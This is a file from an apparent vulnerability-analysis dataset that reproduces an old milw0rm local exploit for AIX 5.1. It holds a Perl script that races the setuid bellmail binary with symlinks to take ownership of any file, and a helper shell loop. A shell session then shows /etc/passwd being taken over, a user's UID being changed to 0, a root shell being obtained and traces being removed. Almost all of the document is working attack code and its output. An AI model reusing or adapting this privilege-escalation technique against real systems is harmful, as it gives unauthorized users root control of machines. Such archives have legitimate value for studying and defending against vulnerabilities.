Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1001.txt289 linesDownload Raw Back to exploits
1-bash-2.05b$

2-bash-2.05b$ cat x_aix5_bellmail.pl

3#!/usr/bin/perl

4# FileName: x_aix5_bellmail.pl

5# Exploit "Race condition vulnerability (BUGTRAQ  ID: 8805)" of /usr/bin/bellmail

6#         command on Aix5 to change any file owner to current user.

7#

8#Usage    : x_aix5_bellmail.pl aim_file

9#           aim_file : then file wich you want to chown to you.

10#    Note : Maybe you should run more than one to "Race condition".

11#           The file named "x_bell.sh" can help you to use this exp.

12#           You should type "w" "Enter" then "q"  "Enter" key on keyboard

13#          as fast as you can when bellmail prompt "?" appear.

14#

15# Author  : watercloud@xfocus.org

16#     XFOCUS Team    

17#     http://www.xfocus.net   (CN)

18#     http://www.xfocus.org   (EN)

19#

20# Date    : 2004-6-6

21# Tested  : on  Aix5.1.

22# Addition: IBM had offered a patch named "IY25661" for it.

23# Announce: use as your owner risk!

24

25$CMD="/usr/bin/bellmail";

26$MBOX="$ENV{HOME}/mbox";

27$TMPFILE="/tmp/.xbellm.tmp";

28

29$AIM_FILE = shift @ARGV ;

30$FORK_NUM = 1000;

31

32die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE;

33

34unlink $MBOX;

35system "echo abc > $TMPFILE";

36system "$CMD $ENV{LOGIN} < $TMPFILE";

37unlink $TMPFILE;

38

39$ret=`ls -l $AIM_FILE"`;

40print "Before: $ret";

41

42if( fork()==0 )

43{

44        &deamon($FORK_NUM);

45        exit 0 ;

46}

47sleep( (rand()*100)%4);

48exec $CMD;

49

50$ret=`ls -l $AIM_FILE"`;

51print "Now: $ret";

52

53sub deamon {

54        $num = shift || 1;

55        for($i=0;$i<$num;$i++) {

56                &do_real() if fork()==0;

57        }

58}

59sub do_real {

60        if(-e $MBOX) {

61                unlink $MBOX ;

62                symlink "$AIM_FILE",$MBOX;

63        }

64        exit 0;

65}

66#EOF

67

68

69

70

71

72

73

74-bash-2.05b$

75-bash-2.05b$ cat x_bellmail.sh

76#!/bin/sh

77#File:x_bellmail.sh

78#The assistant of x_aix5_bellmail.pl

79#Author : watercloud@xfocus.org

80#Date   :2004-6-6

81#

82

83X_BELL_PL="./x_aix5_bellmail.pl"

84AIM=$1

85

86if [ $# ne 1 ] ;then

87        echo "Need a aim file name as argv."

88        exit 1;

89fi

90

91if [ ! -e "$1" ];then

92        echo "$1 not exist!"

93        exit 1

94fi

95if [ ! -x "$X_BELL_PL" ];then

96        echo "can not exec $X_BELL_PL"

97        exit 1

98fi

99

100ret=`ls -l $AIM`

101echo $ret; echo

102fuser=`echo $ret |awk '{print $3}'`

103while [ "$fuser" != "$LOGIN" ]

104do

105        $X_BELL_PL $AIM

106        ret=`ls -l $AIM`

107        echo $ret;echo

108        fuser=`echo $ret |awk '{print $3}'`

109done

110echo $ret; echo

111#EOF

112

113

114

115

116-bash-2.05b$ id

117uid=201(cloud) gid=1(staff)

118-bash-2.05b$

119-bash-2.05b$ oslevel

1205.1.0.0

121-bash-2.05b$ oslevel -r

1225100-01

123-bash-2.05b$ ls -l /usr/bin/bellmail

124-r-sr-sr-x   1 root     mail          30208 Aug 09 2003  /usr/bin/bellmail

125-bash-2.05b$ ls -l /etc/passwd

126-rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

127-bash-2.05b$ cp /etc/passwd /tmp/

128

129

130-bash-2.05b$ ./x_bellmail.sh /etc/passwd

131./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.

132-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

133

134Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

135From cloud Sun Jun  6 08:49:30 2004

136abc

137

138? w

139From cloud Sun Jun  6 08:25:20 2004

140abc

141

142? q

143-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

144

145Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

146From cloud Sun Jun  6 08:49:35 2004

147abc

148

149? w

150From cloud Sun Jun  6 08:25:20 2004

151abc

152

153? q

154-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

155

156Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

157From cloud Sun Jun  6 08:49:40 2004

158abc

159

160? w

161From cloud Sun Jun  6 08:25:20 2004

162abc

163

164? q

165-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

166

167Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

168From cloud Sun Jun  6 08:49:43 2004

169abc

170

171? w

172From cloud Sun Jun  6 08:25:20 2004

173abc

174

175? q

176-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

177

178Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

179w

180From cloud Sun Jun  6 08:49:48 2004

181abc

182

183? From cloud Sun Jun  6 08:25:20 2004

184abc

185

186? w

187bellmail: cannot append to /home/cloud/mbox

188? w

189bellmail: cannot append to /home/cloud/mbox

190? q

191-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

192

193Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

194From cloud Sun Jun  6 08:49:56 2004

195abc

196

197? w

198From cloud Sun Jun  6 08:25:20 2004

199abc

200

201? q

202-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

203

204Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd

205From cloud Sun Jun  6 08:50:01 2004

206abc

207

208? w

209From cloud Sun Jun  6 08:25:20 2004

210abc

211

212? q

213-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd

214

215-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd

216

217

218

219

220

221

222-bash-2.05b$ cat /etc/passwd

223root:!:0:0::/:/usr/bin/ksh

224daemon:!:1:1::/etc:

225bin:!:2:2::/bin:

226sys:!:3:3::/usr/sys:

227adm:!:4:4::/var/adm:

228uucp:!:5:5::/usr/lib/uucp:

229guest:!:100:100::/home/guest:

230nobody:!:4294967294:4294967294::/:

231lpd:!:9:4294967294::/:

232lp:*:11:11::/var/spool/lp:/bin/false

233invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh

234nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico

235snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd

236imnadm:*:188:188::/home/imnadm:/usr/bin/ksh

237cloud:!:201:1::/home/cloud:/usr/local/bin/bash

238

239

240

241-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd

242

243

244-bash-2.05b$ su cloud

245cloud's Password:

2463004-502 Cannot get "LOGNAME" variable.

247-bash-2.05b$ id

248uid=201 gid=1(staff)

249-bash-2.05b$ ls -l /etc/passwd

250-rw-r--r--   1 201      staff           568 Jun 06 08:56 /etc/passwd

251-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash'  >> /etc/passwd

252-bash-2.05b$ cat /etc/passwd

253root:!:0:0::/:/usr/bin/ksh

254daemon:!:1:1::/etc:

255bin:!:2:2::/bin:

256sys:!:3:3::/usr/sys:

257adm:!:4:4::/var/adm:

258uucp:!:5:5::/usr/lib/uucp:

259guest:!:100:100::/home/guest:

260nobody:!:4294967294:4294967294::/:

261lpd:!:9:4294967294::/:

262lp:*:11:11::/var/spool/lp:/bin/false

263invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh

264nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico

265snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd

266imnadm:*:188:188::/home/imnadm:/usr/bin/ksh

267cloud:!:0:1::/home/cloud:/usr/local/bin/bash

268test:!:201:1::/home/cloud:/usr/local/bin/bash

269

270

271-bash-2.05b$ su cloud

272cloud's Password:

273bash-2.05b# id

274uid=0(root) gid=1(staff)

275bash-2.05b# ls -l /etc/passwd

276-rw-r--r--   1 test     staff           614 Jun 06 08:58 /etc/passwd

277bash-2.05b# cp /tmp/passwd /etc/passwd

278bash-2.05b# chown root /tmp/passwd

279bash-2.05b# ls -l /tmp/passwd

280-rw-r--r--   1 root     staff           570 Jun 06 08:48 /tmp/passwd

281bash-2.05b# id

282uid=0(root) gid=1(staff)

283bash-2.05b#

284bash-2.05b# rm /tmp/.bel*

285bash-2.05b# rm /tmp/passwd

286bash-2.05b#

287

288

289# milw0rm.com [2005-05-19]